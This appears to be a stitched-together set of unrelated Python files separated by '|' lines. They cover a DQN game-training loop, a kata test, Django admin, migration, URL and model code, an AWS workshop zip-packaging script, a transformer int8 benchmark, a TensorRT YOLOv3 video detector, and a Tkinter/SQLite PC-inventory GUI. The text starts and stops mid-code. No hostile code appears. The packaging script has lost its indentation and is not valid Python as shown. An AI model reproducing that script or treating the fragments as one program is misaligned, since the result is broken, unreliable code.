        dqn.load_model('./dueling_checkpoint' + str(ckpt) + '.tar')
        print('Start Populating by Model: ', ckpt)
        for ep in range(50):
            game.__init__()
            R = 0
            # First frame: preprocess to 80x80 binary and stack 4 copies.
            obs, reward, terminal = game.frame_step(np.array([1, 0]))
            obs = cv2.cvtColor(cv2.resize(obs, (80, 80)), cv2.COLOR_BGR2GRAY)
            _, obs = cv2.threshold(obs, 1, 255, cv2.THRESH_BINARY)
            obs = np.reshape(obs, (1, 80, 80))
            obs = np.concatenate([obs] * STACK_FRAMES, axis = 0)
            while not terminal:
                # Choose actions
                if iterations % ACTION_IDLE == 0:
                    obs_tmp = torch.tensor(obs, dtype = torch.float32, device = device).reshape(1, STACK_FRAMES, 80, 80)
                    action = dqn.choose_action(obs_tmp, True)
                else:
                    action = torch.tensor(0, dtype = torch.int64, device = device)
                # Get next state (one-hot action for the game)
                if action.cpu().numpy()[0] == 0:
                    act = np.array([1, 0])
                elif action.cpu().numpy()[0] == 1:
                    act = np.array([0, 1])
                obs_, reward, terminal = game.frame_step(act)
                obs_ = cv2.cvtColor(cv2.resize(obs_, (80, 80)), cv2.COLOR_BGR2GRAY)
                _, obs_ = cv2.threshold(obs_, 1, 255, cv2.THRESH_BINARY)
                obs_ = np.reshape(obs_, (1, 80, 80))
                # New stack = new frame + three most recent old frames.
                obs_ = np.concatenate([obs_, obs[:3, ...]], axis = 0)
                # Push transition to replay memory
                transition = [obs, action, reward, obs_, terminal]
                dqn.memory_store(transition)
                # Update
                obs = obs_
                R += reward
            print('Episode: {}, Total Reward: {}'.format(ep, R))
    # Resume training state (episode/iterations) from the latest checkpoint.
    print('Start training by Model: ', 4850)
    episode, iterations = dqn.load_model('./dueling_checkpoint' + str(4850) + '.tar')
# Main training loop: one episode per game, training after OBSERVE steps.
while episode <= EPISODE:
    game.__init__()
    R = 0
    # Get the first frame, preprocess to 80x80 binary, and stack it 4 times
    obs, reward, terminal = game.frame_step(np.array([1, 0]))
    obs = cv2.cvtColor(cv2.resize(obs, (80, 80)), cv2.COLOR_BGR2GRAY)
    _, obs = cv2.threshold(obs, 1, 255, cv2.THRESH_BINARY)
    obs = np.reshape(obs, (1, 80, 80))
    obs = np.concatenate([obs] * STACK_FRAMES, axis = 0)
    while not terminal:
        # Choose actions
        if iterations % ACTION_IDLE == 0:
            obs_tmp = torch.tensor(obs, dtype = torch.float32, device = device).reshape(1, STACK_FRAMES, 80, 80)
            action = dqn.choose_action(obs_tmp)
        else:
            action = torch.tensor(0, dtype = torch.int64, device = device)
        # Get next state (one-hot action for the game)
        if action.cpu().numpy()[0] == 0:
            act = np.array([1, 0])
        elif action.cpu().numpy()[0] == 1:
            act = np.array([0, 1])
        obs_, reward, terminal = game.frame_step(act)
        obs_ = cv2.cvtColor(cv2.resize(obs_, (80, 80)), cv2.COLOR_BGR2GRAY)
        _, obs_ = cv2.threshold(obs_, 1, 255, cv2.THRESH_BINARY)
        obs_ = np.reshape(obs_, (1, 80, 80))
        # New stack = new frame + three most recent old frames.
        obs_ = np.concatenate([obs_, obs[:3, ...]], axis = 0)
        # Push transition to replay memory
        transition = [obs, action, reward, obs_, terminal]
        dqn.memory_store(transition)
        # Train only once enough experience has been observed.
        if iterations > OBSERVE:
            dqn.update_epsilon()
            dqn.train()
        # Update
        obs = obs_
        iterations += 1
        R += reward
        if iterations % SAVE_ITER == 0 and iterations > OBSERVE:
            dqn.save_model(episode, iterations)
    print('Episode: {}, Total Reward: {}, Iterations: {}, Epsilon: {}, Memory Size: {}'.format(episode, R, iterations, dqn.epsilon, len(dqn.replay_memory)))
    episode += 1
|
import unittest
from katas.kyu_7.katastrophe import strong_enough
class StrongEnoughTestCase(unittest.TestCase):
    """Tests for katastrophe.strong_enough."""

    def test_equals(self):
        grid = [[2, 3, 1], [3, 1, 1], [1, 1, 2]]
        self.assertEqual(strong_enough(grid, 2), 'Safe!')

    def test_equals_2(self):
        grid = [[5, 8, 7], [3, 3, 1], [4, 1, 2]]
        self.assertEqual(strong_enough(grid, 2), 'Safe!')

    def test_equals_3(self):
        grid = [[5, 8, 7], [3, 3, 1], [4, 1, 2]]
        self.assertEqual(strong_enough(grid, 3), 'Needs Reinforcement!')
|
from django.contrib import admin
from .models import *
# Register your models here.
# Admin for the product catalogue: enables admin text search on key fields.
class ProductAdmin(admin.ModelAdmin):
    search_fields = ('title', 'description', 'specification')

# Register models with the admin site (Products gets the custom admin).
admin.site.register(Brand)
admin.site.register(Products, ProductAdmin)
admin.site.register(Reviews)
admin.site.register(BuyCart)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Add a required `content` TextField to the analyst Dataset model.

    The one-off default (123) only back-fills existing rows while this
    migration runs; preserve_default=False drops it from the model state.
    """

    dependencies = [
        ('analyst', '0003_auto_20150405_2031'),
    ]

    operations = [
        migrations.AddField(
            model_name='dataset',
            name='content',
            field=models.TextField(default=123),
            preserve_default=False,
        ),
    ]
|
import os
import sys
import glob
import shutil
import ntpath
import subprocess
from pathlib import Path
from zipfile import ZipFile
pkg_root = os.getenv("GITHUB_WORKSPACE")
if not pkg_root:
pkg_root = os.getcwd()
dest_root = os.path.join(pkg_root, 'public')
#clear out the assets folder
shutil.rmtree(os.path.join(dest_root,'assets'), ignore_errors=True)
#Move static assets
Path(dest_root, 'assets').mkdir(parents=True, exist_ok=False)
data_files = ['design-patterns/cloudformation/lab.yaml',
'design-patterns/cloudformation/UserData.sh',
'event-driven/event-driven-cfn.yaml',
'static/files/hands-on-labs/migration-env-setup.yaml',
'static/files/hands-on-labs/migration-dms-setup.yaml']
for inp_file in data_files:
src_file = os.path.join(pkg_root, inp_file)
head, tail = ntpath.split(src_file)
dst_file = os.path.join(dest_root, 'assets', tail or ntpath.basename(head))
shutil.copyfile(src_file, dst_file)
#Create workshop ZIP
os.chdir(os.path.join(pkg_root, 'design-patterns'))
with ZipFile('workshop.zip', 'w') as workshop_zip:
for py_script in glob.glob('./*.py'):
workshop_zip.write(py_script)
for txt_script in glob.glob('./*.txt'):
workshop_zip.write(txt_script)
for js_script in glob.glob('./*.json'):
workshop_zip.write(js_script)
for data_file in glob.glob('./data/*.csv'):
workshop_zip.write(data_file)
shutil.move(os.path.join(os.getcwd(), 'workshop.zip'), os.path.join(dest_root, 'assets', 'workshop.zip'))
#Create solution ZIP
os.chdir(os.path.join(pkg_root, 'scenario-solutions'))
with ZipFile('scenario-solutions.zip', 'w') as workshop_zip:
for scenario1 in glob.glob('./retail-cart/*'):
workshop_zip.write(scenario1)
for scenario2 in glob.glob('./bank-payments/*'):
workshop_zip.write(scenario2)
shutil.move(os.path.join(os.getcwd(), 'scenario-solutions.zip'), os.path.join(dest_root, 'assets', 'scenario-solutions.zip'))
#Create Event Driven ZIPs
zips_to_make = ['MapLambdaPackage', 'ReduceLambdaPackage', 'StateLambdaPackage', 'GeneratorLambdaPackage']
for zip_name in zips_to_make:
os.chdir(os.path.join(pkg_root, 'event-driven', zip_name))
zip_file_name = "{}.zip".format(zip_name)
with ZipFile(zip_file_name, 'w') as workshop_zip:
for python_script in glob.glob("./*.py".format(zip_name)):
head, tail = ntpath.split(python_script)
workshop_zip.write(python_script, tail)
shutil.move(os.path.join(os.getcwd(), zip_file_name), os.path.join(dest_root, 'assets', zip_file_name))
exit()
|
#!/usr/bin/env python3
# Create a program that generates random sequences in FASTA format
# Each name should be unique
# Length should have a minimum and maximum
# GC% should be a parameter
# Use assert statements to check bounds of command line values
# When creating sequences, append and join
# Command line:
# python3 rand_seq.py <# of seqs> <min> <max> <gc>
"""
python3 rand_seq.py 3 10 20 0.5
>seq-0
GCGCGACCTTAT
>seq-1
ATCCTAGAAGT
>seq-2
CTTCGCTCGTG
"""
|
from django.contrib import admin
from django.urls import path
from django.conf import settings
from django.conf.urls.static import static
from shop import views
# URL routes for the shop app; static() appends STATIC_URL file serving.
urlpatterns = [
    path('admin/', admin.site.urls),
    # Root view: initialises/validates the cart before showing the shop.
    path('', views.cart_checker, name='cartChecker'),
    path('home', views.home, name='home'),
    path('addProduct/<int:id>', views.add_product, name='addProduct'),
    path('removeProduct/<int:id>', views.remove_product, name='removeProduct'),
    path('decreaseItem/<int:id>', views.decrease_item, name='decreaseItem'),
    path('checkout', views.checkout, name='checkOut'),
    path('pdf/<int:id>', views.convert_to_pdf, name='pdf'),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
|
import torch
import transformers
import turbo_transformers
from turbo_transformers.layers.utils import convert2tt_tensor, try_convert, convert_returns_as_type, ReturnType
import time
# Benchmark one BERT layer's intermediate block: dynamic-int8 PyTorch
# versus turbo_transformers' quantized implementation, then check that
# their outputs agree.
cfg = transformers.BertConfig()
model = transformers.BertModel(cfg)
model.eval()
torch.set_grad_enabled(False)
intermediate = torch.quantization.quantize_dynamic(model.encoder.layer[0].intermediate)
qintermediate = turbo_transformers.QBertIntermediate.from_torch(model.encoder.layer[0].intermediate)
lens = [10, 20, 40, 60, 80, 100, 200, 300]
loops = 1

def _timed(fn, x, n):
    """Run fn(x) n times; return (last output, queries per second)."""
    t0 = time.time()
    for _ in range(n):
        out = fn(x)
    t1 = time.time()
    return out, n / (t1 - t0)

for l in lens:
    inp = torch.rand(1, l, 768)  # renamed from `input` to avoid shadowing the builtin
    print("seq length =", l)
    res, qps = _timed(intermediate, inp, loops)
    print("torch int8 layer QPS =", qps)
    res2, qps2 = _timed(qintermediate, inp, loops)
    print("turbo int8 layer QPS =", qps2)
    assert torch.max(torch.abs(res - res2)) < 1e-3
|
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
# Create your models here.
class Profile(models.Model):
    """Per-user profile holding a security question for password recovery."""
    user = models.OneToOneField(User, on_delete=models.CASCADE)
    name = models.CharField(max_length=150)
    # Security question and its answer, used for password recovery.
    passwordQuestion = models.CharField(max_length=150)
    passwordQuestionAnswer = models.CharField(max_length=150)
    # phone = models.CharField(max_length=15)
    # gender = models.CharField(max_length=10)
@receiver(post_save, sender=User)
def create_user_profile(sender, instance, created, **kwargs):
    """Create a Profile automatically whenever a new User is created."""
    if created:
        Profile.objects.create(user=instance)

@receiver(post_save, sender=User)
def save_user_profile(sender, instance, **kwargs):
    """Persist the related Profile every time the User is saved."""
    instance.profile.save()
class Video(models.Model):
    """A user-uploaded video with optional thumbnail and filtered variant."""
    user = models.ForeignKey(User, on_delete=models.CASCADE)
    title = models.CharField(max_length=150)
    description = models.TextField()
    pub_date = models.DateTimeField(auto_now_add=True)  # set once on upload
    thumbnail = models.FileField(blank=True)
    filepath = models.FileField()       # the original uploaded file
    filterpath = models.FileField(blank=True)  # processed/filtered output
|
import numpy as np
import scipy.sparse
import imgpr.utils as utils
from .model import FusionModel
# 4-connected neighbour offsets used by the Poisson solver.
delta = [(1, 0), (-1, 0), (0, 1), (0, -1)]
# 8-connected neighbour offsets (not referenced in this chunk).
delta8 = [(1, 0), (-1, 0), (0, 1), (0, -1), (-1, -1), (-1, 1), (1, -1), (1, 1)]
def is_edge(x, y, mask):
    """Count 4-neighbours of (x, y) lying outside the mask.

    Returns 0 when (x, y) itself is outside the mask; otherwise the number
    of its 4-connected neighbours with mask value 0 (> 0 on the region edge).
    """
    if mask[x, y] == 0:
        return 0
    return sum(1 for dx, dy in delta if mask[x + dx, y + dy] == 0)
def get_sparse_matrix(mask_indicies, edge):
    """Assemble the sparse Poisson system matrix over the masked pixels.

    Each masked pixel i gets a row with 4 on the diagonal and -1 for each
    4-neighbour that is also in the mask (discrete Laplacian stencil).
    """
    size = len(mask_indicies)
    # Map pixel coordinate -> row index.
    map_indicies = {pos: i for i, pos in enumerate(mask_indicies)}
    mat = scipy.sparse.lil_matrix((size, size))
    for i, (x, y) in enumerate(mask_indicies):
        if edge[i] < 0:
            mat[i, i] = 1
            continue
        mat[i, i] = 4
        for dx, dy in delta:
            j = map_indicies.get((x + dx, y + dy))
            if j is not None:
                mat[i, j] = -1
    return mat
class PoissonFusion(FusionModel):
    """Poisson (seamless) image cloning: solves a Poisson equation over the
    masked region so the pasted source blends with the target boundary."""

    def _init(self, source, mask):
        self._channels = source.shape[-1]
        # Zero the one-pixel border so neighbour lookups never leave the array.
        mask[0, :] = 0
        mask[:, 0] = 0
        mask[-1, :] = 0
        mask[:, -1] = 0
        self._source = source
        self._mask = mask
        non_zero = np.nonzero(mask)
        mask_indicies = list(zip(*non_zero))
        self._mask_indicies = np.array(mask_indicies)
        # Per masked pixel: count of zero 4-neighbours (> 0 on the region edge).
        self._edge = np.array([is_edge(x, y, mask) for x, y in self._mask_indicies])
        self._sparse_matrix = get_sparse_matrix(mask_indicies, self._edge)
        self._cg_matrix = []
        # Per channel: discrete Laplacian of the source (the guidance field).
        # NOTE(review): utils.xy2index presumably converts (x, y) pairs into
        # numpy fancy indices — confirm against imgpr.utils.
        for channel in range(self._channels):
            src = np.where(mask > 0, source[:, :, channel], 0)
            mat = src[utils.xy2index(self._mask_indicies)] * 4
            for dx, dy in delta:
                indicies = self._mask_indicies + (dx, dy)
                mat -= src[utils.xy2index(indicies)]
            self._cg_matrix.append(mat)

    def _run_fusion(self, image):
        """Fuse the prepared source into *image*, channel by channel."""
        channels = image.shape[-1]
        result = np.zeros_like(image)
        for i in range(channels):
            result[:, :, i] = self._run_channel(i, image[:, :, i])
        return result.astype(int)

    def _run_channel(self, channel, image):
        """Solve the Poisson system for one channel via conjugate gradient."""
        assert(channel < self._channels)
        edge = image[utils.xy2index(self._mask_indicies)]
        source = self._source[:, :, channel]
        edge2 = source[utils.xy2index(self._mask_indicies)]
        # Right-hand side: guidance Laplacian plus the boundary contribution
        # (target minus source values, weighted by the edge-neighbour count).
        mat = self._cg_matrix[channel] + (edge - edge2) * self._edge
        # mat = np.where(self._edge > 0, edge, self._cg_matrix[channel])
        mask = scipy.sparse.linalg.cg(self._sparse_matrix, mat)
        result = np.zeros_like(image)
        # cg returns (solution, info); take the solution vector.
        result[utils.xy2index(self._mask_indicies)] = mask[0]
        return np.where(self._mask > 0, result, image).clip(0, 255)
|
#!/usr/bin/env python3
#
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import common
import os
import numpy as np
import tensorrt as trt
import pycuda.driver as cuda
import pycuda.autoinit
from PIL import ImageDraw, Image
import argparse
import time
import cv2
from halo import Halo
from data_processing import PreprocessYOLO, PostprocessYOLO, ALL_CATEGORIES
import os
TRT_LOGGER = trt.Logger()
def draw_bboxes(image_raw, bboxes, confidences, categories, all_categories, bbox_color='blue'):
    """Draw detection boxes and score labels onto *image_raw* and return it.

    image_raw -- raw PIL Image to draw on
    bboxes -- (N, 4) array of [x, y, width, height] boxes
    confidences -- (N,) array of detection scores
    categories -- (N,) array of category indices
    all_categories -- ordered list mapping category index -> name
    bbox_color -- outline and label colour (default: 'blue')
    """
    # Nothing to draw when any detection component is missing.
    if bboxes is None or confidences is None or categories is None:
        return image_raw
    draw = ImageDraw.Draw(image_raw)
    for box, score, category in zip(bboxes, confidences, categories):
        x_coord, y_coord, width, height = box
        # Round to the nearest pixel and clamp the box to the image bounds.
        left = max(0, np.floor(x_coord + 0.5).astype(int))
        top = max(0, np.floor(y_coord + 0.5).astype(int))
        right = min(image_raw.width, np.floor(x_coord + width + 0.5).astype(int))
        bottom = min(image_raw.height, np.floor(y_coord + height + 0.5).astype(int))
        draw.rectangle(((left, top), (right, bottom)), outline=bbox_color)
        # Label just above the box: "category score".
        draw.text((left, top - 12),
                  '{0} {1:.2f}'.format(all_categories[category], score), fill=bbox_color)
    return image_raw
def get_engine(onnx_file_path, engine_file_path=""):
    """Attempts to load a serialized engine if available, otherwise builds a new TensorRT engine and saves it."""
    def build_engine():
        """Takes an ONNX file and creates a TensorRT engine to run inference with"""
        # All TensorRT objects are context-managed so GPU resources are freed on exit.
        with trt.Builder(TRT_LOGGER) as builder, builder.create_network(common.EXPLICIT_BATCH) as network, builder.create_builder_config() as config, trt.OnnxParser(network, TRT_LOGGER) as parser, trt.Runtime(TRT_LOGGER) as runtime:
            config.max_workspace_size = 1 << 28  # 256MiB
            builder.max_batch_size = 1
            # Parse model file
            if not os.path.exists(onnx_file_path):
                print('ONNX file {} not found, please run yolov3_to_onnx.py first to generate it.'.format(
                    onnx_file_path))
                exit(0)
            print('Loading ONNX file from path {}...'.format(onnx_file_path))
            with open(onnx_file_path, 'rb') as model:
                print('Beginning ONNX file parsing')
                if not parser.parse(model.read()):
                    print('ERROR: Failed to parse the ONNX file.')
                    for error in range(parser.num_errors):
                        print(parser.get_error(error))
                    return None
            # The actual yolov3.onnx is generated with batch size 64. Reshape input to batch size 1
            network.get_input(0).shape = [1, 3, 608, 608]
            print('Completed parsing of ONNX file')
            print('Building an engine from file {}; this may take a while...'.format(
                onnx_file_path))
            # build_serialized_network returns a serialized plan that can be cached
            # on disk and deserialized later without repeating the slow build.
            # NOTE(review): if the build fails, plan is None and
            # deserialize_cuda_engine will raise -- confirm desired behavior.
            plan = builder.build_serialized_network(network, config)
            engine = runtime.deserialize_cuda_engine(plan)
            print("Completed creating Engine")
            # Cache the serialized plan so subsequent runs skip the build.
            with open(engine_file_path, "wb") as f:
                f.write(plan)
            return engine
    if os.path.exists(engine_file_path):
        # If a serialized engine exists, use it instead of building an engine.
        print("Reading engine from file {}".format(engine_file_path))
        with open(engine_file_path, "rb") as f, trt.Runtime(TRT_LOGGER) as runtime:
            return runtime.deserialize_cuda_engine(f.read())
    else:
        return build_engine()
def convertCV2PIL(image):
    """Convert an OpenCV BGR ndarray into an RGB PIL Image."""
    rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
    return Image.fromarray(rgb)
def convertPIL2CV(image):
    """Convert an RGB PIL Image into an OpenCV BGR ndarray."""
    arr = np.array(image)
    return cv2.cvtColor(arr, cv2.COLOR_RGB2BGR)
def main():
    """Create a TensorRT engine for ONNX-based YOLOv3-608 and run inference.

    Reads frames from the input video, runs YOLOv3 on each frame through
    TensorRT, draws the detected bounding boxes plus an FPS overlay, and
    writes the annotated frames to the output video file.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('-o', '--onnx', type=str,
                        help="File path to the onnx model")
    parser.add_argument('-e', '--engine', type=str,
                        help="File path to store the engine")
    parser.add_argument('-v', '--video', type=str,
                        help="Path to the video file")
    parser.add_argument('-f', '--frame', type=int,
                        help="Number of frames to run the script")
    parser.add_argument('-s', '--save', type=str, default="result.mp4", help="Path to save the output result")
    args = parser.parse_args()
    # Try to load a previously generated YOLOv3-608 network graph in ONNX format:
    onnx_file_path = args.onnx
    engine_file_path = args.engine
    # Two-dimensional tuple with the target network's (spatial) input resolution in HW ordered
    input_resolution_yolov3_HW = (608, 608)
    # Create a pre-processor object by specifying the required input resolution for YOLOv3
    preprocessor = PreprocessYOLO(input_resolution_yolov3_HW)
    postprocessor_args = {"yolo_masks": [(6, 7, 8), (3, 4, 5), (0, 1, 2)],  # A list of 3 three-dimensional tuples for the YOLO masks
                          "yolo_anchors": [(10, 13), (16, 30), (33, 23), (30, 61), (62, 45),  # A list of 9 two-dimensional tuples for the YOLO anchors
                                           (59, 119), (116, 90), (156, 198), (373, 326)],
                          # Threshold for object coverage, float value between 0 and 1
                          "obj_threshold": 0.6,
                          # Threshold for non-max suppression algorithm, float value between 0 and 1
                          "nms_threshold": 0.5,
                          "yolo_input_resolution": input_resolution_yolov3_HW}
    postprocessor = PostprocessYOLO(**postprocessor_args)
    # Output shapes expected by the post-processor
    output_shapes = [(1, 30, 19, 19), (1, 30, 38, 38), (1, 30, 76, 76)]
    # Do inference with TensorRT
    input_video = cv2.VideoCapture(args.video)
    frame_width = input_video.get(cv2.CAP_PROP_FRAME_WIDTH)
    frame_height = input_video.get(cv2.CAP_PROP_FRAME_HEIGHT)
    frame_size = (int(frame_width), int(frame_height))
    # Remove any previous result so the writer starts from a clean file.
    if os.path.exists(args.save):
        print(f"Removing the already existing the {args.save}")
        os.remove(args.save)
    input_video_fps = int(input_video.get(cv2.CAP_PROP_FPS))
    output_video_writer = cv2.VideoWriter(
        args.save, cv2.VideoWriter_fourcc(*'MP4V'), input_video_fps, frame_size)
    frame_count = 0
    with get_engine(onnx_file_path, engine_file_path) as engine, engine.create_execution_context() as context:
        inputs, outputs, bindings, stream = common.allocate_buffers(engine)
        # Halo spinner gives per-frame progress/FPS feedback on the console.
        with Halo(spinner="dots", text="loading frames") as sp:
            while True:
                ret, frame = input_video.read()
                if ret:
                    frame_count += 1
                    image = convertCV2PIL(frame)
                    image_raw, image = preprocessor.process_image(image)
                    # Store the shape of the original input image in WH format, we will need it for later
                    shape_orig_WH = image_raw.size
                    # Set host input to the image. The common.do_inference function will copy the input to the GPU before executing.
                    inputs[0].host = image
                    # starting the timer
                    start = time.time()
                    trt_outputs = common.do_inference_v2(context, bindings=bindings, inputs=inputs, outputs=outputs, stream=stream)
                    # Before doing post-processing, we need to reshape the outputs as the common.do_inference will give us flat arrays.
                    trt_outputs = [output.reshape(shape) for output, shape in zip(
                        trt_outputs, output_shapes)]
                    # Run the post-processing algorithms on the TensorRT outputs and get the bounding box details of detected objects
                    boxes, classes, scores = postprocessor.process(
                        trt_outputs, (shape_orig_WH))
                    # ending of the timer
                    end = time.time()
                    inference_fps = round(1 / (end - start), 2)
                    sp.text = f"Frame {frame_count} Inference Fps {inference_fps}"
                    # Draw the bounding boxes onto the original input image
                    obj_detected_img = draw_bboxes(
                        image_raw, boxes, scores, classes, ALL_CATEGORIES)
                    detection = convertPIL2CV(obj_detected_img)
                    cv2.putText(detection, f"Input FPS: {input_video_fps} | Inference FPS {inference_fps}", (50, 50), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 255, 0), 2)
                    output_video_writer.write(detection)
                    # Stop early once the requested number of frames was processed.
                    if args.frame is not None and args.frame == frame_count:
                        break
                else:
                    # End of the video stream.
                    break
    input_video.release()
    output_video_writer.release()


if __name__ == '__main__':
    main()
|
def clear_all_table():
    """Empty every data table widget in the UI."""
    for table in all_tables():
        clear_table(table)
def clear_all_wigets():
    """Reset the whole UI: deselect the PC, clear lists/tables/entries, disable controls."""
    global selected_pc
    selected_pc = ""
    clear_listbox(computer_list)
    clear_all_table()
    entryes_clear()
    enryes_state(DISABLED)
    for button in (btn_save, btn_delete):
        button["state"] = DISABLED
def online_click(event):
    """Switch the listbox to show only PCs that are currently online."""
    global online
    # Already in online mode -- nothing to do.
    if online != False and online != None:
        return
    online = True
    clear_all_wigets()
    for entry in names_list:
        computer_list.insert(END, entry[0])
def offline_click(event):
    """Switch the listbox to show PCs known in the DB but not currently online.

    Loads every pc_name from the computers table, removes the ones present
    in the global names_list (the online PCs), and fills the listbox with
    the remainder.
    """
    global online
    if online == True or online == None:
        online = False
        clear_all_wigets()
        # Fetch every known PC name from the local database.
        sqlite_connect = sqlite3.connect("netspc.db")
        try:
            cursor = sqlite_connect.cursor()
            cursor.execute('''
                SELECT pc_name
                FROM computers;
            ''')
            db_names = cursor.fetchall()
            cursor.close()
        finally:
            # Bug fix: the connection was previously never closed (leak).
            sqlite_connect.close()
        names = [replace_dash_with_minus(row[0]) for row in db_names]
        # Online names as a set for O(1) membership tests.
        online_names = {pc[0] for pc in names_list}
        # Bug fix: the old loop popped from `names` while iterating the online
        # list, which could pop the wrong element when a name matched more
        # than one online entry; filtering preserves order and is safe.
        offline = [name for name in names if name not in online_names]
        for name in offline:
            computer_list.insert(END, name)
def get_entryes_list():
    """Return the five database Entry widgets in display order."""
    return [first_db_entry, second_db_entry, third_db_entry,
            fourth_db_entry, fifth_db_entry]
def enryes_state(state):
    """Set every DB entry widget to the given Tk state (DISABLED or NORMAL)."""
    for widget in get_entryes_list():
        widget["state"] = state
def entryes_clear():
    """Wipe the text of every DB entry widget."""
    for widget in get_entryes_list():
        widget.delete(0, "end")
def all_tables():
    """Return every table (Treeview) widget in the UI, in layout order."""
    return [table_info, table_propertys, table_processes,
            table_services, table_programs, table_computers,
            table_hardwares]
def delete_selections_in_others_tables(table):
    """Remove the (first) selection from every table except the given one."""
    for other in all_tables():
        if other == table:
            continue
        selection = other.selection()
        if len(selection) > 0:
            other.selection_remove(selection[0])
def table_computers_select(table):
    """Handle a selection in the computers table: load the row into the edit entries."""
    if len(table.selection()) != 0:
        global table_selected, old_id
        # 1 == the "computers" table is the active edit target (read by save()).
        table_selected = 1
        enryes_state(NORMAL)
        entryes_clear()
        # The computers table has no fourth field, so blank and disable that entry.
        fourth_db_lable["text"] = ""
        fourth_db_entry["state"] = DISABLED
        # Rows from this table can be edited but not deleted from the UI.
        btn_delete["state"] = DISABLED
        btn_save["state"] = NORMAL
        delete_selections_in_others_tables(table)
        for selection in table.selection():
            item = table.item(selection)
            inventory_number, date_buy, room = item["values"][0: 3]
            first_db_lable["text"] = "Id"
            first_db_entry.insert(0, inventory_number)
            # Remember the original id so save() can locate the row to UPDATE.
            old_id = inventory_number
            second_db_lable["text"] = "Дата покупки"
            second_db_entry.insert(0, date_buy)
            third_db_lable["text"] = "Кабинет"
            third_db_entry.insert(0, room)
def table_hardwares_select(table):
    """Handle a selection in the hardwares table: load the row into the edit entries."""
    if len(table.selection()) != 0:
        global table_selected
        # 2 == the "hardwares" table is the active edit target (read by save()/delete()).
        table_selected = 2
        enryes_state(NORMAL)
        btn_save["state"] = NORMAL
        delete_selections_in_others_tables(table)
        entryes_clear()
        for selection in table.selection():
            item = table.item(selection)
            hardware, data_setting, repair, comment, id = item["values"][0: 5]
            first_db_lable["text"] = "Устройство"
            first_db_entry.insert(0, hardware)
            second_db_lable["text"] = "Дата установки"
            second_db_entry.insert(0, data_setting)
            third_db_lable["text"] = "Ремонт"
            third_db_entry.insert(0, repair)
            fourth_db_lable["text"] = "Коментарий"
            fourth_db_entry.insert(0, comment)
            # The fifth entry carries the DB row id used by save()/delete().
            fifth_db_entry.insert(0, id)
            # "None" means the row is not yet persisted, so deletion is impossible.
            if id == "None":
                btn_delete["state"] = DISABLED
            else:
                btn_delete["state"] = NORMAL
def sqlite_erorr(error):
    """Show a warning dialog describing a sqlite error."""
    messagebox.showwarning("Ошибка при подключении к sqlite ", error)
def save(event):
    """Persist the currently edited row to the database.

    Dispatches on the global table_selected flag set by the table select
    handlers: 1 -> UPDATE computers, 2 -> INSERT or UPDATE hardwares
    (INSERT when the hidden id entry holds "None"/empty). Finishes by
    refreshing the UI via database_get_pc().
    """
    if event.widget.cget("state") == "normal":
        try:
            sqlite_connection = sqlite3.connect("netspc.db")
            cursor = sqlite_connection.cursor()
            pc_name = replace_minus_with_dash(selected_pc)
            if table_selected == 1:
                # Security fix: parameterized queries instead of f-string
                # interpolation of entry text (SQL injection / quoting bugs).
                query = '''
                    UPDATE computers
                    SET inventory_number=?,
                        date_buy=?,
                        room=?,
                        pc_name=?
                    WHERE inventory_number=?;
                '''
                params = (first_db_entry.get(), second_db_entry.get(),
                          third_db_entry.get(), pc_name, old_id)
            elif table_selected == 2:
                id = fifth_db_entry.get()
                if id == "None" or id == "":
                    # No row id yet -> create a new hardware record.
                    query = '''
                        INSERT INTO hardwares
                            (hardware, data_setting, repair, comment, pc_name)
                        VALUES (?, ?, ?, ?, ?);
                    '''
                    params = (first_db_entry.get(), second_db_entry.get(),
                              third_db_entry.get(), fourth_db_entry.get(),
                              pc_name)
                else:
                    query = '''
                        UPDATE hardwares
                        SET hardware=?,
                            data_setting=?,
                            repair=?,
                            comment=?,
                            pc_name=?
                        WHERE id=?;
                    '''
                    params = (first_db_entry.get(), second_db_entry.get(),
                              third_db_entry.get(), fourth_db_entry.get(),
                              pc_name, id)
            cursor.execute(query, params)
            sqlite_connection.commit()
            cursor.close()
        except sqlite3.Error as error:
            sqlite_erorr(error)
        finally:
            if (sqlite_connection):
                sqlite_connection.close()
                print("Соединение с SQLite закрыто")
        database_get_pc()
def delete(event):
    """Delete the selected hardware row from the database.

    Only acts when the hardwares table is the active edit target and the
    hidden id entry holds a real row id. Finishes by refreshing the UI
    via database_get_pc().
    """
    if event.widget.cget("state") == "normal":
        try:
            sqlite_connection = sqlite3.connect("netspc.db")
            cursor = sqlite_connection.cursor()
            if table_selected == 2:
                id = fifth_db_entry.get()
                # Bug fix: the original condition used `or`, which is always
                # true; only rows with a real persisted id can be deleted.
                if id != "None" and id != "":
                    # Parameterized to avoid SQL injection / quoting bugs.
                    cursor.execute("DELETE FROM hardwares WHERE id=?;", (id,))
                    sqlite_connection.commit()
            cursor.close()
        except sqlite3.Error as error:
            sqlite_erorr(error)
        finally:
            if (sqlite_connection):
                sqlite_connection.close()
                print("Соединение с SQLite закрыто")
        database_get_pc()
def name_select(event):
    """Handle a PC selection in the listbox: populate all data tables for that PC.

    Refreshes only when the selection changed or the PC's data was marked as
    updated, then re-triggers the background data fetch.
    """
    global updated, selected_pc
    pc_name = chosen_name(computer_list)
    if select_pс(pc_name) or is_update(updated, pc_name):
        clear_all_table()
    if (select_pс(pc_name) or is_update(updated, pc_name)) and pc_name != "":
        client_pc = get_pc(pc_name)
        selected_pc = pc_name
        # PC information: dump key/value pairs up to and including available_ram.
        for key, item in client_pc.items():
            table_info.insert("", END, values=(key, item))
            if key == "available_ram":
                del key, item
                break
        # PC properties (load figures).
        table_propertys.insert("", END, values=(
            "Загрузка процессора", client_pc["cpu_usage"]))
        table_propertys.insert("", END, values=(
